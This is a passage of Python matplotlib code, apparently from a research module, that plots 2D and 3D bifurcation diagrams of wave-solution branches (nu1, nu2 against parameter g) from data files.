ax1.plot([L4[g_int_p1]],[1.5],[M4[g_int_p1]],marker='o',markeredgecolor='none',color='black',markersize=8,zorder=100)
ax1.plot([L4[g_int_p2]],[1.5],[M4[g_int_p2]],marker='o',markeredgecolor='none',color='red',markersize=8,zorder=100)
cmap = plt.get_cmap('gray_r')
my_cmap = truncate_colormap(cmap,.0,.75)
ax2.add_collection(collect(L1,M1,lwstart=3.,lwfactor=4.))
ax1.add_collection3d(collect(L1,M1,lwstart=3.,lwfactor=4.),zs=1.5,zdir='y')
#ax2.plot(L1,M1)
ax2.add_collection(collect(L2,M2,lwstart=3.,lwfactor=4.))
ax1.add_collection3d(collect(L2,M2,lwstart=3.,lwfactor=4.),zs=1.5,zdir='y')
#ax2.plot(L2,M2)
ax2.add_collection(collect(L3,M3,lwstart=3.,lwfactor=4.))
ax1.add_collection3d(collect(L3,M3,lwstart=3.,lwfactor=4.),zs=1.5,zdir='y')
#ax2.plot(L3,M3)
ax2.add_collection(collect(L4,M4,lwstart=3.,lwfactor=4.))
ax1.add_collection3d(collect(L4,M4,lwstart=3.,lwfactor=4.),zs=1.5,zdir='y')
#ax2.plot(L4,M4)
ax2.add_collection(collect(L5,M5,lwstart=3.,lwfactor=4.))
ax1.add_collection3d(collect(L5,M5,lwstart=3.,lwfactor=4.),zs=1.5,zdir='y')
#ax2.plot(L5,M5)
#ax1.plot([0,5],[0,0],color='black')
ax2.annotate(r'$x$-axis direction',
xy=(.65,.01),xycoords='data',textcoords='data',
xytext=(.45,.2),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$y$-axis direction',
xy=(.01,.65),xycoords='data',textcoords='data',
xytext=(.1,.45),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$g^*$',
xy=(.03,.015),xycoords='data',textcoords='data',
xytext=(.2,.07),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
"""
ax2.annotate(r'$g^*$',
alpha=0.,
xy=(.01,.01),xycoords='data',textcoords='data',
xytext=(.4,.07),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
"""
ax2.annotate('Diagonal direction',
xy=(.68,.7),xycoords='data',textcoords='data',
xytext=(.2,.65),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal\ndirection',
xy=(1.4,.63),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
alpha=0.,
xy=(1.4,1.14),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Multiple non-axial directions',
xy=(3.68,.1),xycoords='data',textcoords='data',
xytext=(3.,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
#ax1.plot([.89,.89],[-3,3],color='gray')
#ax1.plot([3.,3.],[-3,3],color='gray')
ax1.view_init(20,-8)
ax1.set_xlim(0,1.2)
ax1.set_ylim(0,1.5)
ax1.set_zlim(0.,1.2)
ax1.set_xlabel(r'$\nu_1$')
ax1.set_ylabel(r'$g$')
ax1.set_zlabel(r'$\nu_2$')
ax2.set_xlabel(r'$\nu_1$')
ax2.set_ylabel(r'$\nu_2$')
ax2.set_xlim(-.05,1.2)
ax2.set_ylim(-.05,1.2)
return fig
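The `truncate_colormap` helper called above (to keep only the `.0`-`.75` slice of `gray_r`) is defined elsewhere in this module. A minimal, hedged stand-in, assuming the usual resampling recipe (the name `truncate_colormap_sketch` is illustrative, not the module's API):

```python
# Sketch only: assumed reimplementation of the module's truncate_colormap helper.
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.colors import LinearSegmentedColormap

def truncate_colormap_sketch(cmap, minval=0.0, maxval=1.0, n=256):
    """Resample the [minval, maxval] slice of cmap into a new colormap."""
    name = 'trunc({},{:.2f},{:.2f})'.format(cmap.name, minval, maxval)
    return LinearSegmentedColormap.from_list(name, cmap(np.linspace(minval, maxval, n)))

my_cmap = truncate_colormap_sketch(plt.get_cmap('gray_r'), .0, .75)
```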
def wave_exist_2d_trunc_v4(b=.8):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
as a function of g
"""
# get data
# nc1 bifurcation values
bif = np.loadtxt('twod_wave_trunc_exist_all.dat')
#bif2 = np.loadtxt('twod_wave_exist_br2.dat')
# get all possible disjoint branches
val,ty = collect_disjoint_branches(bif,remove_isolated=True,isolated_number=50)
if False:
mp.figure()
for key in val.keys():
mp.plot(val[key][:,1],val[key][:,2],label=key)
mp.legend()
mp.show()
# fix branches to satisfy bounds
# bound the values: 0 <= g <= 4, 0 <= vi <= 2
gmin = 0.
gmax = 4.
vimin = 0.
vimax = 2.
# loop over each branch
# add bounded guys to new dict val_final
val_final = {}
ty_final = {}
for key in val.keys():
g = val[key][:,0]
v1 = val[key][:,2]
v2 = val[key][:,3]
idx = ((g>=gmin)*(g<=gmax)*
(v1>=vimin)*(v1<=vimax)*
(v2>=vimin)*(v2<=vimax))
if (len(g[idx]) == 0) or\
(len(v1[idx]) == 0) or\
(len(v2[idx]) == 0):
pass
else:
#print key,ty[key][0,1]
val_final[key] = np.zeros((len(g[idx]),3))
val_final[key][:,0] = g[idx]
val_final[key][:,1] = v1[idx]
val_final[key][:,2] = v2[idx]
ty_final[key] = ty[key]
#print key,ty_final[key]
#bifx_raw=bif[:,3];bify_raw=bif[:,7]
#bifx2_raw=bif[:,3];bify2_raw=bif[:,8]
# use this plot to choose branches
if False:
mp.figure()
for key in val_final.keys():
mp.plot(val_final[key][:,1],val_final[key][:,2],label=key)
mp.legend()
mp.show()
#print
#br14
#br23
#br48
#br40
"""
val_final.pop('br12')
val_final.pop('br10')
val_final.pop('br14')
#val_final.pop('br29') # need. axial.
#val_final.pop('br30') # need. axial.
#val_final.pop('br35') # need. axial.
#val_final.pop('br36') # need. axial.
#val_final.pop('br2') # need. zero.
val_final.pop('br20')
#val_final.pop('br4')
"""
plane1_z = 0.75
plane2_z = 2.4
"""
# get plane intersection idx
bifx_int_p1 = np.argmin(np.abs(bifx_nonan-plane1_z))
bifx_int_p2 = np.argmin(np.abs(bifx_nonan-plane2_z))
bifx2_int_p1 = np.argmin(np.abs(bifx2_nonan-plane1_z))
bifx2_int_p2 = np.argmin(np.abs(bifx2_nonan-plane2_z))
"""
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121, projection='3d')
ax1 = fig.add_axes(MyAxes3D(ax1, 'l'))
ax2 = fig.add_subplot(122)
# add modified curves to figure
for key in val_final.keys():
g = val_final[key][:,0]
v1 = val_final[key][:,1]
v2 = val_final[key][:,2]
#print g
if key == 'br29' or key == 'br35':
ax1.add_collection3d(collect3d_colorgrad(v1,g,v2,use_nonan=False,zorder=4,
lwstart=2,lwend=4,
cmapmin=.3,cmapmax=.7))
if key == 'br35':
ax1.add_collection3d(collect3d_colorgrad(v2,g,v1,use_nonan=False,zorder=4,
lwstart=2,lwend=4,
cmapmin=.3,cmapmax=.7))
elif key == 'br30' or key == 'br36':
ax1.add_collection3d(collect3d_colorgrad(v1,g,v2,use_nonan=False,zorder=4,
lwstart=4,lwend=5,
cmapmin=.7,cmapmax=1.))
elif key == 'br48' or key == 'br40':
ax1.add_collection3d(collect3d_colorgrad(v1,g,v2,use_nonan=False,zorder=4,
lwstart=4,lwend=5,
cmapmin=.7,cmapmax=1.))
elif key == 'br2':
pass
#ax1.add_collection3d(collect3d_colorgrad(v1[v1>.01],g[v1>.01],v2[v1>.01],use_nonan=False,zorder=4,
# lwstart=1,lwend=5,
# cmapmin=.3,cmapmax=1.))
else:
print(key)
ax1.add_collection3d(collect3d_colorgrad(v1,g,v2,use_nonan=False,zorder=4,
lwstart=1,lwend=5,
cmapmin=.3,cmapmax=1.))
# plot the initial zero branch
g = np.linspace(gmin,.75,10)
ax1.add_collection3d(collect3d_colorgrad(0.*g,g,0.*g,use_nonan=False,zorder=2,
lwstart=1,lwend=2,
cmapmin=.1,cmapmax=.3))
# plot bifurcation planes
X,Y = np.meshgrid(np.linspace(0,vimax,10),np.linspace(0,vimax,10))
Xhalf1,Yhalf1 = np.meshgrid(np.linspace(1.3,vimax,10),np.linspace(0,vimax,10))
Xhalf2,Yhalf2 = np.meshgrid(np.linspace(0,1.3,10),np.linspace(0,1.1,10))
Xhalf3,Yhalf3 = np.meshgrid(np.linspace(0,1.3,10),np.linspace(1.1,vimax,10))
#ax1.plot_surface(Xhalf1,0.*Xhalf1+plane2_z,Yhalf1,alpha=.6,color='green',lw=0,edgecolor='none',zorder=1)
ax1.plot_surface(X,0.*X+plane1_z,Y,alpha=.6,color='red',lw=0,edgecolor='none')
ax1.plot_surface(Xhalf1,0.*X+plane2_z,Yhalf1,alpha=.6,color='green',lw=0,edgecolor='none')
ax1.plot_surface(Xhalf2,0.*X+plane2_z,Yhalf2,alpha=.6,color='green',lw=0,edgecolor='none',zorder=-1)
ax1.plot_surface(Xhalf3,0.*X+plane2_z,Yhalf3,alpha=.6,color='green',lw=0,edgecolor='none',zorder=1)
#ax1.plot_surface(X,0.*X+plane2_z,Y,alpha=.6,color='green')
# plot intersection points
#ax1.plot([0.],[1.17],[.51],marker='o',markersize='6',color='red',markeredgecolor='none',zorder=100)
ax1.plot([0.],[plane1_z],[0],marker='o',color='black',markersize=8,zorder=100,markeredgecolor='none')
ax1.plot([1.45],[plane2_z],[0],marker='o',color='red',markersize=8,zorder=100,markeredgecolor='none')
ax1.plot([0],[plane2_z],[1.45],marker='o',color='red',markersize=8,zorder=100,markeredgecolor='none')
ax1.plot([1.05],[plane2_z],[1.05],marker='o',color='red',markersize=8,zorder=100,markeredgecolor='none')
# plot projection
ax1.plot([0.],[gmax],[0],marker='o',color='black',markersize=8,zorder=100,markeredgecolor='none')
ax1.plot([1.45],[gmax],[0],marker='o',color='red',markersize=8,zorder=100,markeredgecolor='none')
ax1.plot([0],[gmax],[1.45],marker='o',color='red',markersize=8,zorder=100,markeredgecolor='none')
ax1.plot([1.05],[gmax],[1.05],marker='o',color='red',markersize=8,zorder=100,markeredgecolor='none')
# plot curves in 2d + 2d projection in 3d plot
zs = gmax
# axial branches
for key in val_final.keys():
g = val_final[key][:,0]
v1 = val_final[key][:,1]
v2 = val_final[key][:,2]
if key == 'br29' or key == 'br35':
ax2.add_collection(collect(v1,v2,use_nonan=False,lwstart=2.,lwend=4.,cmapmin=.3,cmapmax=.7,zorder=5))
ax1.add_collection3d(collect(v1,v2,use_nonan=False,lwstart=2.,lwend=4.,cmapmin=.3,cmapmax=.7,zorder=5),zs=zs,zdir='y')
elif key == 'br30' or key == 'br36':
ax2.add_collection(collect(v1,v2,use_nonan=False,lwstart=4.,lwend=5.,cmapmin=.7,cmapmax=1,zorder=5))
ax1.add_collection3d(collect(v1,v2,use_nonan=False,lwstart=4.,lwend=5.,cmapmin=.7,cmapmax=1,zorder=5),zs=zs,zdir='y')
elif key == 'br48' or key == 'br40':
ax2.add_collection(collect(v1,v2,use_nonan=False,lwstart=4.,lwend=5.,cmapmin=.7,cmapmax=1,zorder=5))
ax1.add_collection3d(collect(v1,v2,use_nonan=False,lwstart=4.,lwend=5.,cmapmin=.7,cmapmax=1,zorder=5),zs=zs,zdir='y')
ax2.add_collection(collect(v1,v2,use_nonan=False,lwstart=2.,lwend=5.,cmapmin=.3,zorder=5))
ax1.add_collection3d(collect(v1,v2,use_nonan=False,lwstart=2.,lwend=5.,cmapmin=.3,zorder=5),zs=zs,zdir='y')
# plot intersections on 2d
ax2.scatter([0],[0],marker='o',color='black',s=70,zorder=100)
ax2.scatter([1.45],[0],marker='o',color='red',s=70,zorder=100)
ax2.scatter([0],[1.45],marker='o',color='red',s=70,zorder=100)
ax2.scatter([1.05],[1.05],marker='o',color='red',s=70,zorder=100)
#ax1.plot([0,5],[0,0],color='black')
ax2.annotate(r'$x$-axis direction',
xy=(.65,.01),xycoords='data',textcoords='data',
xytext=(.45,.2),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$y$-axis direction',
xy=(.01,.65),xycoords='data',textcoords='data',
xytext=(.1,1.),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$g^*$',
xy=(.03,.015),xycoords='data',textcoords='data',
xytext=(.2,.07),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
"""
ax2.annotate(r'$g^*$',
alpha=0.,
xy=(.01,.01),xycoords='data',textcoords='data',
xytext=(.4,.07),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
"""
ax2.annotate('Diagonal direction',
xy=(.7,.7),xycoords='data',textcoords='data',
xytext=(.9,.65),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
xy=(1.75,.5),xycoords='data',textcoords='data',
xytext=(1.5,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
alpha=0.,
xy=(.5,1.75),xycoords='data',textcoords='data',
xytext=(1.5,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Multiple non-axial directions',xy=(3.68,.1),xycoords='data',textcoords='data',xytext=(3.,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
#ax1.plot([.89,.89],[-3,3],color='gray')
#ax1.plot([3.,3.],[-3,3],color='gray')
ax1.view_init(20,-8)
"""
tmp_planes = ax1.zaxis._PLANES
ax1.zaxis._PLANES = ( tmp_planes[2], tmp_planes[3],
tmp_planes[0], tmp_planes[1],
tmp_planes[4], tmp_planes[5])
"""
ax1.set_xlim(vimin,vimax)
ax1.set_ylim(gmin,gmax)
ax1.set_zlim(vimin,vimax)
ax1.set_xlabel(r'$\nu_1$')
ax1.set_ylabel(r'$g$')
ax1.set_zlabel(r'$\nu_2$')
ax2.set_xlabel(r'$\nu_1$')
ax2.set_ylabel(r'$\nu_2$')
ax2.set_xlim(-.05+vimin,vimax)
ax2.set_ylim(-.05+vimin,vimax)
return fig
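The branch-bounding loop in `wave_exist_2d_trunc_v4` above reduces to one boolean mask per branch: keep only the samples whose `(g, v1, v2)` values fall inside the plotting box. A self-contained sketch of that step on synthetic data, using the same column layout as the loop (`g` in column 0, `v1`/`v2` in columns 2 and 3; the function name is illustrative):

```python
# Sketch of the branch-bounding step; synthetic data, assumed helper name.
import numpy as np

def bound_branch(arr, gmin, gmax, vimin, vimax):
    """Return the in-bounds rows of a branch as (g, v1, v2), or None if empty."""
    g, v1, v2 = arr[:, 0], arr[:, 2], arr[:, 3]
    idx = ((g >= gmin) & (g <= gmax) &
           (v1 >= vimin) & (v1 <= vimax) &
           (v2 >= vimin) & (v2 <= vimax))
    if not idx.any():
        return None
    out = np.zeros((idx.sum(), 3))
    out[:, 0] = g[idx]
    out[:, 1] = v1[idx]
    out[:, 2] = v2[idx]
    return out

branch = np.array([[0.5, 0., 0.1, 0.2],
                   [3.0, 0., 1.0, 1.5],
                   [5.0, 0., 0.3, 0.4]])  # last row: g out of bounds
kept = bound_branch(branch, gmin=0., gmax=4., vimin=0., vimax=2.)
```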
def wave_exist_2d_full_v2(b=.8):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
as a function of g
use the accurate Fourier series
"""
# get data
# nc1 bifurcation values
bif = np.loadtxt('twod_wave_exist_br1.dat')
#bif2 = np.loadtxt('twod_wave_exist_br2.dat')
bif_diag1 = np.loadtxt('twod_wave_exist_diag1.dat')
bif_diag2 = np.loadtxt('twod_wave_exist_diag2.dat')
# clean
bifx,bify = clean(bif[:,3],bif[:,7],tol=.47)
bifx2,bify2 = clean(bif[:,3],bif[:,8],tol=.47)
bif_diag1x,bif_diag1y = clean(bif_diag1[:,0],np.abs(bif_diag1[:,1]),tol=.2)
bif_diag2x,bif_diag2y = clean(bif_diag2[:,0],np.abs(bif_diag2[:,1]),tol=.2)
# remove nans before calculating minima (np.argmin/np.argmax otherwise return the position of a nan)
bifx_nonan = bifx[(~np.isnan(bifx))*(~np.isnan(bify))]
bify_nonan = bify[(~np.isnan(bifx))*(~np.isnan(bify))]
bifx2_nonan = bifx2[(~np.isnan(bifx2))*(~np.isnan(bify2))]
bify2_nonan = bify2[(~np.isnan(bifx2))*(~np.isnan(bify2))]
bif_diag1x_nonan = bif_diag1x[(~np.isnan(bif_diag1x))*(~np.isnan(bif_diag1y))]
bif_diag1y_nonan = bif_diag1y[(~np.isnan(bif_diag1x))*(~np.isnan(bif_diag1y))]
bif_diag2x_nonan = bif_diag2x[(~np.isnan(bif_diag2x))*(~np.isnan(bif_diag2y))]
bif_diag2y_nonan = bif_diag2y[(~np.isnan(bif_diag2x))*(~np.isnan(bif_diag2y))]
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122)
plane1_z = .895
plane2_z = 1.17
# get plane intersection idx
bifx_int_p1 = np.argmin(np.abs(bifx_nonan-plane1_z))
bifx_int_p2 = np.argmin(np.abs(bifx_nonan-plane2_z))
bifx2_int_p1 = np.argmin(np.abs(bifx2_nonan-plane1_z))
bifx2_int_p2 = np.argmin(np.abs(bifx2_nonan-plane2_z))
bif_diagx_int_p1 = np.argmin(np.abs(bif_diag1x_nonan-plane1_z))
bif_diagx_int_p2 = np.argmin(np.abs(bif_diag1x_nonan-plane2_z))
bif_diagx2_int_p1 = np.argmin(np.abs(bif_diag2x_nonan-plane1_z))
bif_diagx2_int_p2 = np.argmin(np.abs(bif_diag2x_nonan-plane2_z))
## plot curves in 3d
# plot off diagonal and axial curves
v1a = bify2[(bify>=0)*(bify2>=0)*(bify<=1)*(bify2<=1)*(bifx<=2)]
v2a = bify[(bify>=0)*(bify2>=0)*(bify<=1)*(bify2<=1)*(bifx<=2)]
ga = bifx[(bify>=0)*(bify2>=0)*(bify<=1)*(bify2<=1)*(bifx<=2)]
#v1b = bif_diag1y[(bif_diag1y>=0)*(bif_diag2y>=0)*(bif_diag1y<=1)*(bif_diag2y<=1)*(bif_diag1x<=2)]
#v2b = bif_diag1y[(bif_diag1y>=0)*(bif_diag2y>=0)*(bif_diag1y<=1)*(bif_diag2y<=1)*(bif_diag1x<=2)]
gb = np.linspace(np.amin(bif_diag1x[~np.isnan(bif_diag1x)]),np.amax(bif_diag1x[~np.isnan(bif_diag1x)]),20)
# clean
ga,v1a,v2a = clean3d(ga,v1a,v2a,tol=.47)
# remove nans for linewidth stuff later.
ga_nonan = ga[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
v1a_nonan = v1a[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
v2a_nonan = v2a[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
# prep for plotting with different line widths
sol = np.zeros((len(ga),3))
sol[:,0] = v1a
sol[:,1] = ga
sol[:,2] = v2a
sol = np.transpose(sol)
points = np.array([sol[0,:],sol[1,:],sol[2,:]]).T.reshape(-1,1,3)
segs = np.concatenate([points[:-1],points[1:]],axis = 1)
line3d = Line3DCollection(segs,linewidths=(1.+(v1a_nonan)/np.amax(v1a_nonan)*3.),colors='k')
# add modified curves to figure
ax1.add_collection3d(line3d)
# repeat above to capture remaining axial branch(es)
# prep for plotting with different line widths
sol = np.zeros((len(ga),3))
sol[:,0] = v2a
sol[:,1] = ga
sol[:,2] = v1a
sol = np.transpose(sol)
points = np.array([sol[0,:],sol[1,:],sol[2,:]]).T.reshape(-1,1,3)
segs = np.concatenate([points[:-1],points[1:]],axis = 1)
line3d = Line3DCollection(segs,linewidths=(1.+(v2a_nonan)/np.amax(v2a_nonan)*3.),colors='k')
# add modified curves to figure
ax1.add_collection3d(line3d)
# plot diagonal branches
# prep for plotting with different line widths
diagx = bif_diag2y[(bif_diag2y<=1)*(bif_diag2x<=2.)]
diagy = bif_diag2x[(bif_diag2y<=1)*(bif_diag2x<=2.)]
diagz = bif_diag2y[(bif_diag2y<=1)*(bif_diag2x<=2.)]
diagx_nonan = diagx[~np.isnan(diagx)]
sol = np.zeros((len(diagx),3))
sol[:,0] = diagx
sol[:,1] = diagy
sol[:,2] = diagz
sol = np.transpose(sol)
points2 = np.array([sol[0,:],sol[1,:],sol[2,:]]).T.reshape(-1,1,3)
segs2 = np.concatenate([points2[:-1],points2[1:]],axis = 1)
line3d2 = Line3DCollection(segs2,linewidths=(1.+(diagx_nonan)/np.amax(diagx_nonan)*3.),colors='k')
ax1.add_collection3d(line3d2)
# plot zero solution
ax1.plot([.0,0],[.5,plane1_z],[.0,0],color='black',lw=1)
# plot bifurcation planes
X,Y = np.meshgrid(np.linspace(0,1,10),np.linspace(0,1,10))
ax1.plot_surface(X,0.*X+plane1_z,Y,alpha=.5,color='gray')
ax1.plot_surface(X,0.*X+plane2_z,Y,alpha=.5,color='red')
# plot plane intersections
ax1.scatter(bify[bifx_int_p1],bifx[bifx_int_p1],bify2[bifx_int_p1],color='black',s=20)
#ax1.scatter(bify[bifx_int_p2],bifx[bifx_int_p2],bify2[bifx_int_p2],color='black',s=20)
#ax1.scatter(bif_diag2y_nonan[bif_diagx_int_p2],bif_diag1x_nonan[bif_diagx_int_p2],bif_diag1y_nonan[bif_diagx_int_p2],color='black',s=20)
ax1.scatter(0,1.17,.51,color='red',s=20,zorder=10)
ax1.scatter(.5,1.17,0.,color='red',s=40,zorder=10)
ax1.scatter(.37,1.17,.37,color='red',s=50,zorder=10)
"""
ax1.scatter(L1[g_int_p2],g[g_int_p2],M1[g_int_p2],color='black',s=20)
ax1.scatter(L2[g_int_p1],g[g_int_p1],M2[g_int_p1],color='black',s=20)
ax1.scatter(L2[g_int_p2],g[g_int_p2],M2[g_int_p2],color='black',s=20)
ax1.scatter(L3[g_int_p1],g[g_int_p1],M3[g_int_p1],color='black',s=20)
ax1.scatter(L3[g_int_p2],g[g_int_p2],M3[g_int_p2],color='black',s=20)
ax1.scatter(L4[g_int_p1],g[g_int_p1],M4[g_int_p1],color='black',s=20)
ax1.scatter(L4[g_int_p2],g[g_int_p2],M4[g_int_p2],color='black',s=20)
"""
## plot curves in 2d
# bifurcation lines
ax2.plot([plane1_z,plane1_z],[-1,1.8],color='black',alpha=.5,lw=2)
ax2.plot([plane2_z,plane2_z],[-1,1.8],color='red',alpha=.5,lw=2)
ax2.plot(bifx,bify,color='black')
ax2.plot(bifx2,bify2,color='black')
ax2.plot(bif_diag1x,bif_diag1y,color='black')
ax2.plot(bif_diag2x,bif_diag2y,color='black')
ax2.plot([0,5],[0,0],color='black')
# label curves
ax2.annotate(r'$x$-axis direction',
xy=(1.04,.37),xycoords='data',textcoords='data',
xytext=(.6,.6),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$y$-axis direction',
xy=(1.0,.0),xycoords='data',textcoords='data',
xytext=(.55,.33),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$g^*$',
xy=(.9,.0),xycoords='data',textcoords='data',
xytext=(.8,.05),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Diagonal',
xy=(1.1,.32),xycoords='data',textcoords='data',
xytext=(1.4,.2),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
xy=(1.4,.41),xycoords='data',textcoords='data',
xytext=(1.5,.34),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
alpha=0.,
xy=(1.4,.62),xycoords='data',textcoords='data',
xytext=(1.5,.34),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
# plot params
ax1.view_init(20,-8)
# set labels
ax1.set_xlabel(r'$\nu_2$')
ax2.set_xlabel(r'$g$')
ax1.set_ylabel(r'$g$')
ax2.set_ylabel(r'$\nu_1$')
ax1.set_zlabel(r'$\nu_1$')
ax1.set_xlim(0.,1.)
ax2.set_xlim(.5,2.)
ax1.set_ylim(.5,2.)
ax2.set_ylim(-.05,1.)
ax1.set_zlim(0.,1.)
#plt.show()
return fig
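The variable-linewidth 3D curves in `wave_exist_2d_full_v2` above all follow the same recipe: stack the samples into points, pair consecutive points into segments, and hand `Line3DCollection` one width per segment. A self-contained sketch of just that technique, on a synthetic helix with the headless `Agg` backend:

```python
# Sketch of the per-segment linewidth recipe used above; synthetic data.
import numpy as np
import matplotlib
matplotlib.use('Agg')  # headless backend for this sketch
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d.art3d import Line3DCollection

t = np.linspace(0, 2*np.pi, 50)
x, y, z = np.cos(t), np.sin(t), t/(2*np.pi)

points = np.array([x, y, z]).T.reshape(-1, 1, 3)
segs = np.concatenate([points[:-1], points[1:]], axis=1)  # shape (N-1, 2, 3)
widths = 1. + 3.*z[:-1]/np.amax(z[:-1])                   # one width per segment

fig = plt.figure()
ax = fig.add_subplot(projection='3d')
ax.add_collection3d(Line3DCollection(segs, linewidths=widths, colors='k'))
ax.set_xlim(-1, 1); ax.set_ylim(-1, 1); ax.set_zlim(0, 1)
```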
def wave_exist_2d_full_v2_testing(b=.8):
"""
testing to figure out how to implement linewidth changes in one plot.
"""
#from matplotlib.collections import LineCollection
from matplotlib.collections import PolyCollection
from matplotlib import colors as mcolors
fig = plt.figure()
ax = fig.add_subplot(projection='3d')
xcoord = np.linspace(0,pi,100)
ycoord = np.linspace(0,pi,100)
xs = cos(xcoord)+6.
ys = 3*sin(ycoord)+1.5
zs = .25+0.*np.sqrt(xcoord**2.+ycoord**2.)
sol = np.zeros((len(xs),3))
sol[:,0] = xs
sol[:,1] = ys
sol[:,2] = zs
sol = np.transpose(sol)
points = np.array([sol[0,:],sol[1,:],sol[2,:]]).T.reshape(-1,1,3)
segs = np.concatenate([points[:-1],points[1:]],axis = 1)
line3d = Line3DCollection(segs,linewidths=ys)
line3d.set_alpha(0.7)
ax.add_collection3d(line3d)#, zs=zs)
ax.set_xlabel('X')
ax.set_xlim3d(0, 10)
ax.set_ylabel('Y')
ax.set_ylim3d(-1, 4)
ax.set_zlabel('Z')
ax.set_zlim3d(0, 1)
plt.show()
"""
from matplotlib.collections import LineCollection
x=np.linspace(0,4*pi,10000)
y=cos(x)
lwidths=1+x[:-1]
points = np.array([x, y]).T.reshape(-1, 1, 2)
segments = np.concatenate([points[:-1], points[1:]], axis=1)
lc = LineCollection(segments, linewidths=lwidths,color='blue')
fig,a = plt.subplots()
a.add_collection(lc)
a.set_xlim(0,4*pi)
a.set_ylim(-1.1,1.1)
fig.show()
"""
return fig
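The nan-masking idiom used before every `np.argmin` call in these routines exists because `np.argmin` on an array containing nan returns the position of the (first) nan rather than the true minimum. A minimal sketch of the fix, on synthetic data:

```python
# Sketch of the nan-masking idiom used before np.argmin above; synthetic data.
import numpy as np

g = np.array([0.5, np.nan, 0.9, 1.1, np.nan, 1.3])
plane_z = 1.17

# np.argmin(np.abs(g - plane_z)) would land on index 1, the first nan.
g_nonan = g[~np.isnan(g)]                   # drop nan samples first
idx = np.argmin(np.abs(g_nonan - plane_z))  # nearest sample to the plane
```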
def wave_exist_2d_full_v3(b=.8):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
as a function of g.
g is shown implicitly as color/thickness.
scatter dots included at contour lines to give an additional sense of depth
use the accurate Fourier series
"""
# get data
# nc1 bifurcation values
bif = np.loadtxt('twod_wave_exist_br1.dat')
#bif2 = np.loadtxt('twod_wave_exist_br2.dat')
bif_diag1 = np.loadtxt('twod_wave_exist_diag1.dat')
bif_diag2 = np.loadtxt('twod_wave_exist_diag2.dat')
# bound the values: .5 <= g <= 1.6, 0 <= vi <= 1
gmin = .5
gmax = 1.6
vimin = 0.
vimax = 1.
bifx_raw=bif[:,3];bify_raw=bif[:,7]
bifx2_raw=bif[:,3];bify2_raw=bif[:,8]
bif_diagx_raw=bif_diag2[:,0];bif_diagy_raw=np.abs(bif_diag2[:,1])
# get true/false arrays for entries satisfying the bounds
bnd_idx_bool = ((bifx_raw>=gmin)*(bifx_raw<=gmax)*
(bify_raw>=vimin)*(bify_raw<=vimax)*
(bify2_raw>=vimin)*(bify2_raw<=vimax))
print(bifx2_raw[bnd_idx_bool])
print(bify2_raw[bnd_idx_bool])
# get actual indices
bnd_idx = np.arange(0,len(bnd_idx_bool),1)[bnd_idx_bool]
# extract only 1 copy of a branch
diff = 0
i = 1
final_bnd_idx = []
"""
while diff <= 10:
# as long as the next index is no more than 10 units, append.
diff = np.abs(bnd_idx[i] - bnd_idx[i-1])
final_bnd_idx.append(bnd_idx[i-1])
i += 1
"""
#final_bnd_idx = np.array(final_bnd_idx,dtype=int) # convert back to np array
final_bnd_idx = bnd_idx_bool
bifx_bndd = bifx_raw[final_bnd_idx]
bify_bndd = bify_raw[final_bnd_idx]
bifx2_bndd = bifx2_raw[final_bnd_idx]
bify2_bndd = bify2_raw[final_bnd_idx]
bif_diagx_bndd = bif_diagx_raw[(bif_diagx_raw>=gmin)*(bif_diagx_raw<=gmax)*
(bif_diagy_raw>=vimin)*(bif_diagy_raw<=vimax)]
bif_diagy_bndd = bif_diagy_raw[(bif_diagx_raw>=gmin)*(bif_diagx_raw<=gmax)*
(bif_diagy_raw>=vimin)*(bif_diagy_raw<=vimax)]
# clean
bifx,bify = clean(bifx_bndd,bify_bndd,tol=.3)
